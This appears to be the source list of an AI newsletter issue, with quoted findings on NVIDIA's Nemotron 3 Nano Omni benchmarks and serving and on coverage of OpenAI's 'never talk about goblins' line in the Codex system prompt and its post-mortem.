Nemotron Nano Omni is a sub-agent; Codex's prompt is a post-mortem
Every URL the pipeline pulled into ranking for this issue — primary sources plus the supporting and contradicting findings each Researcher returned. Inline citations in the issue point back here.
Sources
Introducing NVIDIA Nemotron 3 Nano Omni: Long-Context Multimodal Intelligence for Documents, Audio and Video Agents huggingface.co
Quoting OpenAI Codex base_instructions simonwillison.net
Never talk about goblins, gremlins, raccoons, trolls, ogres, pigeons, or other animals or creatures unless it is absolutely and unambiguously relevant to the user’s query. — OpenAI Codex base_instructions , for GPT-5.5 Tags: openai , ai , llms , system-prompts , prompt-engineering , codex-cli , generative-ai , gpt
References
BenchLM head-to-head leaderboard benchlm.ai
Qwen3.6-27B currently holds an aggregate lead (74 to 56), showing superior performance in coding and complex mathematical reasoning
Open WebUI GitHub discussion #24264 github.com
files exceeding 10-15 seconds can trigger transcription errors (e.g., ‘NoneType’ object has no attribute ‘strip’) or persistent disconnection alerts
E2E Networks ASR benchmark (L4 GPU) e2enetworks.com
Parakeet-TDT 0.6B has recorded a 6.34% WER, surpassing Whisper Large-v3 Turbo’s 7.8%… a 35-minute audio file being processed in 18 seconds by Parakeet TDT, while Whisper Turbo took 3 minutes
vLLM project blog on Nemotron-Omni serving vllm.ai
EVS integrated directly into the serving pipeline… Independent testing indicates that EVS can reduce time-to-first-token (TTFT) by up to 4x with minimal impact on accuracy
The Decoder the-decoder.com
pass-rate filtering: prompts that the model can already solve with over 80% accuracy at initialization are discarded, focusing RL efforts on complex, unsolved cases
K-Dense AI partner deployment notes k-dense.ai
many implementers still pair the Nano Omni (as the ‘eyes and ears’) with larger models like Nemotron-3 Ultra for high-level decision-making
Engadget — ‘ChatGPT developed a goblin obsession after OpenAI tried to make it nerdy’ engadget.com
Reward signals meant to encourage a ‘Nerdy’ personality accidentally over-rewarded creature-heavy metaphors, causing ‘goblin’ to appear in outputs nearly 175% more often than in previous iterations.
Developpez.com — OpenAI post-mortem coverage intelligence-artificielle.developpez.com
Le signal de récompense a été repris dans les données de fine-tuning supervisé suivantes, ‘cuisant’ le tic dans l’architecture du modèle — OpenAI a dû écrire quatre fois ‘ne parle jamais de gobelins’ dans le prompt de Codex.
VentureBeat — ‘Why OpenAI’s goblin problem matters’ venturebeat.com
The ‘Release the Goblins’ problem: the ironic tendency of negative constraints to act as attractors rather than deterrents… OpenAI’s own documentation tells developers to avoid ‘don’t do X’ instructions, yet their internal Codex prompt does exactly that — a ‘do as I say, not as I do’ inconsistency.
Reddit r/AI_Agents — ‘Codex’s system prompt is mostly about sandboxing’ reddit.com
Unlike Anthropic’s Claude Code, which leads with an identity as a ‘software engineering task’ agent, the Codex prompt focuses immediately on filesystem sandboxing rules… instructing the model to split commands at pipes or && to evaluate each segment against security restrictions.
Business Insider — ‘OpenAI really, really wants GPT-5.5 to stop talking about goblins’ businessinsider.com
Some observers initially speculated the list functioned as ‘canary words’ — randomized tokens used to detect prompt injection or data leakage — but the thematic consistency suggested a targeted behavioral fix instead.
Reddit r/PromptEngineering — negative constraints discussion reddit.com
In a 2026 battery of 36 cross-task tests, prompts using negative-only constraints scored 72/120 versus 116/120 for affirmative framing… adding self-evident constraints to Claude-Sonnet-4.5 led to performance drops of up to 35%.